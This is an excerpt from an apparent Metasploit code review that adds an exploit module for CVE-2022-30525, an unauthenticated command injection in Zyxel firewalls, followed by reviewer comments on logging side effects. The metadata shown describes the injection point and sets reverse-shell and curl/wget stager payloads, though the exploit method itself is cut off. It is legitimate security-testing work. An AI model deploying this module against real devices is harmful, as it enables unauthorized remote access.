modules/exploits/linux/http/zyxel_ztp_rce.rb

```diff
@@ -0,0 +1,157 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection',
+        'Description' => %q{
+          This module exploits CVE-2022-30525, an unauthenticated and remote
+          command injection vulnerability affecting Zyxel firewalls with zero
+          touch provisioning (ZTP) support. This module exploits a command injection
+          exposed by the /ztp/cgi-bin/handler when handling setWanPortSt commands.
+          The module adds OS commands to the mtu field of the setWanPortSt request
+          in order to achieve command execution as `nobody`.
+
+          Affected Zyxel models are:
+
+          * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below
+          * USG20-VPN and USG20W-VPN using firmware 5.21 and below
+          * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'jbaines-r7' # Vulnerability discovery and Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2022-30525' ],
+          [ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/']
+        ],
+        'DisclosureDate' => '2022-04-28',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_MIPS64,],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Shell Dropper',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_MIPS64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'curl', 'wget' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
```

Comment:
Would we not want to add IOC_IN_LOGS given I imagine the commands or web requests will be logged somewhere? Granted given pretty much every target these days has something to this degree I do question why its still a SideEffects option but probably relevant here 🤷

Reply:
This is a good point. I was thinking in terms of "no logs a user can access" but if you pop the device you can see the request logs and there is a support(?) feature that will export logs to a USB so they might be in there. So, IOC_IN_LOGS is technically correct (the best kind). Thanks for popping it in!